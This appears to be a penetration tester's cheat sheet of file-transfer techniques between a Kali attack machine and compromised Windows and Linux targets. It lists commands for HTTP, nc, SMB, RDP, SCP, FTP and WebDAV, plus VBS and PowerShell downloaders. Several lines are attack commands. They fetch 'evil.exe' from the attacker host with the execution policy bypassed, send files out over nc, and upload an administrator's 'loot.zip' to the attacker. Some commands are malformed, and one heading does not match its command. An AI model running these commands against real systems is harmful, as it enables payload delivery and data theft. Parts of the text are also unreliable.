Python server

  • From kali: python3 -m http.server $port
  • From target Windows:
    • powershell: iwr -uri http://$kaliIP:$port/$file -o $file
    • cmd: certutil.exe -urlcache -split -f http://$kaliIP/$file C:\Windows\temp\$file
  • From target Linux:
    • wget http://$kaliIP:$port/$file

nc

  1. on target - nc -w 3 $kaliIP 4444 < file.txt
  2. on kali - nc -lvnp 4444 > file.txt

SMB

  • From kali:
    • sudo impacket-smbserver -smb2support $shareName $sharedDirectory -username "$kaliUser" -password "$kaliPass"
  • From target:
    • `net use m: \$kaliIP$shareName /user:$kaliUser $kaliPass
    • `copy/get $file m:\
  • Example:
    1. on kali - sudo impacket-smbserver -smb2support share . -username "pop" -password "party1"
    2. on target - net use \\$kaliIP\share /user:pop party1
    3. on target - copy $file \\$kaliIP\share

Over RDP

  • xfreerdp /u:admin /p:password /v:$target /drive:/$directoryToShare,$nameToShare /dynamic-resolution
  • xfreerdp /v:IP /u:USERNAME /p:PASSWORD +clipboard /dynamic-resolution /drive:/.

SSH/SCP

scp -P $sshPort $file $user@$targetIP:$destFolder

FTP

  • From Kali: python -m pyftpdlib -p 21 --write (to provide write access)
  • From windows: ftp $kaliPass (anonymous:anonymous)

wsgidav

`wsgidav –host=0.0.0.0 –port=80 –auth=anonymous –root $directoryToShare

  • host specifies the host to listen to, “0.0.0.0” means all interaces, “–auth=anonymous” disables authentication (fine for sharing specific files during this context), and the “–root” flag specifies the directory to share.

.vbs file

Downloads a file from a self hosted web server:

echo strUrl = WScript.Arguments.Item(0) > wget.vbs 
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs 
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs 
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs 
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs 
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs 
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs 
echo  Err.Clear >> wget.vbs 
echo  Set http = Nothing >> wget.vbs 
echo  Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs 
echo  If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs 
echo  If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs 
echo  If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs 
echo  http.Open "GET", strURL, False >> wget.vbs 
echo  http.Send >> wget.vbs 
echo  varByteArray = http.ResponseBody >> wget.vbs 
echo  Set http = Nothing >> wget.vbs 
echo  Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs 
echo  Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs 
echo  strData = "" >> wget.vbs 
echo  strBuffer = "" >> wget.vbs 
echo  For lngCounter = 0 to UBound(varByteArray) >> wget.vbs 
echo  ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs 
echo  Next >> wget.vbs 
echo  ts.Close >> wget.vbs SAMPLE USAGE: `cscript wget.vbs http://$kaliIP/evil.exe evil.exe`

Powershell script builder 

echo $webclient = New-Object System.Net.WebClient >>wget.ps1 
echo $url = "http://[IP]/evil.exe" >>wget.ps1 
echo $file = "new-exploit.exe" >>wget.ps1 
echo $webclient.DownloadFile($url,$file) >>wget.ps1

Usage: - powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 - powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://$kaliIP/winPEAS.bat, 'winpeas.bat')

exe2hex

exe2hex converts to a script that recreates the file from hex string via non-interactive methods:

powershell.exe (New-Object System.Net.WebClient).UploadFile('C:\Users\Administrator\loot.zip', 'http://$kaliIP$/20220204195540_loot.zip')